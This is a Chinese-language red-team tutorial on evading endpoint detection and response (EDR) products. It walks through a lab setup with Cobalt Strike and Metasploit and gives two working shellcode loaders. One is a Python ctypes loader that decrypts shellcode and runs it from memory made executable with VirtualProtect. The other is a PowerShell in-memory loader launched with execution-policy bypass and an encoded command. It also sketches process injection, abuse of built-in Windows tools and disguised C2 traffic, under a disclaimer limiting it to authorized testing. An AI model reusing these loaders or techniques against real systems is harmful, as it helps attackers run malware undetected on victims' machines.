一、理解EDR的核心机制:攻防对抗起点
在绕过EDR(Endpoint Detection and Response,终端检测与响应)之前,我们需要深入理解它的核心工作原理。EDR是现代终端防护的主力,通常具备以下几种能力:
- 行为分析:通过捕获系统调用、文件操作、进程创建、网络请求等行为,判断是否存在恶意活动。
- 内存扫描:分析内存中的恶意代码特征,尤其是检测动态加载的模块或shellcode。
- 签名检测:基于特征库检测已知的恶意代码、工具和加载方式。
- 流量监控:检测C2通信流量,通过协议识别、流量模式分析等方式发现异常。
要绕过EDR,必须找到它检测逻辑中的盲点或可利用的漏洞。而EDR的核心机制给我们提供了以下几种攻防对抗点:
- 行为混淆:通过修改恶意代码的操作逻辑,规避行为分析。
- 内存免杀:绕过内存扫描的特征匹配。
- 规避进程监控:隐藏恶意进程或伪装为合法进程。
- 流量伪装:将C2通信伪装成合法流量。
接下来的内容,我将结合实际案例,逐步展示如何从攻击者视角绕过EDR的检测,形成一条完整的攻击链。
---
二、构建测试环境:请准备你的靶场
为了深入实践,我们需要搭建一个安全的实验环境。本次演示的测试环境如下:
环境需求
- 目标机器:Windows 10 (安装主流EDR工具,如CrowdStrike、Carbon Black等)
- 攻击机:Kali Linux(工具包含Cobalt Strike、Python、Metasploit等)
- 网络环境:确保目标和攻击机可以互相通信
环境搭建步骤
- 在虚拟机中安装一台干净的Windows 10系统,并安装一款主流的EDR工具。
- 在Kali Linux中安装Cobalt Strike和Metasploit Framework,确保工具可用。
- 设置目标机器和攻击机的网络通信,确保可以双向访问。
完成环境搭建后,我们就可以开始测试EDR绕过技术了。下面进入我们的实战环节。
---
三、内存免杀:突破EDR的核心防线
EDR的核心检测能力之一是扫描内存中的恶意代码。然而,大多数EDR依赖内存特征匹配或行为分析来检测内存中的威胁。因此,如果我们能够修改shellcode的加载方式,或者对其进行加密与混淆,就可以绕过内存扫描。
内存免杀的关键技术点
- 动态解密shellcode:将payload以加密形式存储,在内存中动态解密执行。
- 内存分配策略:避免常见的内存分配函数(如VirtualAlloc)被EDR标记。
- API挂钩绕过:部分EDR通过挂钩系统API来监控行为,我们需要通过直接调用系统调用(syscall)来规避。
POC代码:动态解密shellcode
以下是一个基于Python的示例代码,展示如何对shellcode进行简单的加密和动态解密执行。
<pre><code class="language-python">import ctypes import base64
加密后的shellcode,这里以Base64形式存储
encrypted_shellcode = "f0VMRgIBAQAAAAAAAAAAAA..." # 替换为实际加密后的shellcode
解密函数
def decrypt_shellcode(encrypted_code):
这里使用简单的Base64解密,实际攻击中可以使用更复杂的算法
return base64.b64decode(encrypted_code)
动态加载Shellcode并执行
def execute_shellcode(shellcode):
分配内存
shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode)) shellcode_address = ctypes.cast(shellcode_buffer, ctypes.c_void_p).value
改变内存保护为可执行
ctypes.windll.kernel32.VirtualProtect( ctypes.c_void_p(shellcode_address), ctypes.c_size_t(len(shellcode)), 0x40, # PAGE_EXECUTE_READWRITE ctypes.byref(ctypes.c_ulong()) )
执行Shellcode
shell_func = ctypes.cast(shellcode_address, ctypes.CFUNCTYPE(None)) shell_func()
if __name__ == "__main__": decrypted_shellcode = decrypt_shellcode(encrypted_shellcode) execute_shellcode(decrypted_shellcode)</code></pre>
为什么有效?
- 动态解密:shellcode在内存中以加密形式存储,EDR无法直接检测到其特征。
- 内存分配:通过
VirtualProtect动态修改内存权限,而非直接分配可执行内存。 - 规避特征:通过加密与动态解密,打破了EDR的静态特征匹配能力。
---
四、行为混淆:让EDR摸不着头脑
行为分析是EDR的重要检测手段,它通过进程行为链来判断潜在威胁。例如,如果某个进程频繁调用网络请求或高权限操作,很可能被标记为恶意行为。
行为混淆的核心思路
- 分阶段加载:将恶意行为拆分为多个阶段,避免一次性触发EDR的规则。
- 合法进程注入:将恶意代码注入到合法进程中,从而伪装成正常行为。
- 利用白名单程序:通过白名单程序(如PowerShell、MSBuild等)执行恶意代码。
实战案例:利用PowerShell绕过EDR
以下是一个利用PowerShell加载恶意payload的示例代码,该方法常用于文件免杀和行为混淆。
<pre><code class="language-bash"># 将shellcode编码为Base64 $payload = "[Base64编码的Shellcode]" # 替换为实际的Base64 shellcode
PowerShell脚本
$ps_script = @" \$shellcode = [System.Convert]::FromBase64String('$payload') \$memory = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(\$shellcode.Length) [System.Runtime.InteropServices.Marshal]::Copy(\$shellcode, 0, \$memory, \$shellcode.Length) \$execute = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(\$memory, [type]::GetType('System.Action')).Invoke() "@
执行PowerShell脚本
echo $ps_script | powershell -noprofile -ep bypass -encodedcommand $([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($ps_script)))</code></pre>
技术亮点
- 行为分离:通过PowerShell加载payload,将恶意行为与原始进程分离。
- 合法工具执行:利用PowerShell作为加载器,伪装出合法行为。
- 绕过黑名单:与直接运行恶意代码相比,PowerShell的行为更容易通过EDR的行为检测。
---
五、攻防对抗心得:经验与总结
通过以上实战,我们可以发现,绕过EDR并非无懈可击,而是需要不断寻找其检测逻辑中的漏洞。以下是一些经验总结:
- 动态与混淆:静态签名检测是EDR的弱点,动态加密与分阶段解密是有效的对抗手段。
- 合法工具利用:通过合法工具(如PowerShell、MSBuild、Rundll32等)执行恶意代码,可以规避EDR的黑名单规则。
- 流量伪装:C2通信是EDR检测的重要组成部分,使用HTTPS或DNS隧道可以绕过流量监控。
- 持续更新技术:EDR的检测能力会不断升级,作为红队,需要持续研究新的绕过技术。
---
免责声明:本文章仅限于授权测试和安全研究,切勿用于非法用途。未经授权的攻击行为可能违反法律并导致法律责任。